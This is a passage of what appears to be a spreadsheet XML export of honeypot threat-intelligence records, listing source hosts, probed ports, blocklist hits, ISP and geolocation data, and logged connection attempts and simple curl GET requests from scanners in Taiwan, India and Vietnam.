    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_NTP_H7&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_MT-CPA_H44"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;123&amp;&amp;14103&amp;&amp;39574&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taipei"/>
    <s v="New Taipei"/>
    <s v="Banqiao District"/>
    <s v="1670029"/>
    <s v="NA"/>
    <s v="25.0143"/>
    <s v="121.467"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="None"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7222:f41c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3828"/>
    <x v="3828"/>
    <s v="59-126-229-170.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T07:45:58"/>
    <d v="2023-12-03T09:40:00"/>
    <d v="2025-04-01T07:45:58"/>
    <n v="561"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H40"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;32341&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:e5aa"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3829"/>
    <x v="3829"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T07:39:00"/>
    <d v="2025-04-01T05:28:22"/>
    <d v="2025-04-01T07:39:00"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:a0de"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3830"/>
    <x v="3830"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T07:16:13"/>
    <d v="2025-04-01T07:16:13"/>
    <d v="2025-04-01T07:16:13"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (RajajiNagar)"/>
    <s v="1277333"/>
    <s v="560010"/>
    <s v="13.0123"/>
    <s v="77.5558"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Quadgen WiFi Project C/O Addl GM P3 Bangalore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5c:b9b5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3831"/>
    <x v="3831"/>
    <s v="220-132-6-48.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T06:58:54"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T06:58:54"/>
    <n v="341"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H41&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;6189&amp;&amp;23&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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dc84:630"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3832"/>
    <x v="3832"/>
    <s v="125-229-252-183.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T06:57:24"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T06:57:24"/>
    <n v="546"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_DNS_H2&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="80&amp;&amp;53&amp;&amp;14558&amp;&amp;23&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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7de5:fcb7"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3833"/>
    <x v="3833"/>
    <s v="122-117-135-153.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T06:48:59"/>
    <d v="2023-12-15T10:50:58"/>
    <d v="2025-04-01T06:48:59"/>
    <n v="514"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;14302&amp;&amp;80&amp;&amp;55725&amp;&amp;59622&amp;&amp;59584&amp;&amp;59640&amp;&amp;9100&amp;&amp;55240&amp;&amp;55286&amp;&amp;55330&amp;&amp;56982&amp;&amp;58202&amp;&amp;55535&amp;&amp;37726&amp;&amp;45744&amp;&amp;38594"/>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2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a75:8799"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3834"/>
    <x v="3834"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T06:46:02"/>
    <d v="2025-04-01T06:40:59"/>
    <d v="2025-04-01T06:46:02"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_POSTGRES_H4"/>
    <s v="5432"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="26"/>
    <s v="Thừa Thiên Huế Province"/>
    <s v="Phú Lộc District"/>
    <s v="Phú Lộc"/>
    <s v="1570496"/>
    <s v="NA"/>
    <s v="16.2803"/>
    <s v="107.859"/>
    <s v="24086"/>
    <s v="Viettel Corporation"/>
    <s v="Viettel Corporation"/>
    <s v="business"/>
    <s v="Viettel Group"/>
    <s v="2007-05-18"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_POSTGRES:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7467:4d6e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3835"/>
    <x v="3835"/>
    <s v="59-126-35-101.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T06:44:11"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T06:44:11"/>
    <n v="382"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_DNS_H9&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;3058&amp;&amp;23&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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3b7e:2365"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3836"/>
    <x v="3836"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T06:35:54"/>
    <d v="2025-04-01T06:35:54"/>
    <d v="2025-04-01T06:35:54"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:e6c8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3837"/>
    <x v="3837"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T06:25:46"/>
    <d v="2025-04-01T04:41:51"/>
    <d v="2025-04-01T06:25:46"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:5c9b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3838"/>
    <x v="3838"/>
    <s v="NA&amp;&amp;220-132-149-61.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T05:39:22"/>
    <d v="2023-08-04T05:31:00"/>
    <d v="2025-04-01T05:39:22"/>
    <n v="670"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;33883&amp;&amp;23&amp;&amp;NA&amp;&amp;9100&amp;&amp;34894&amp;&amp;80"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
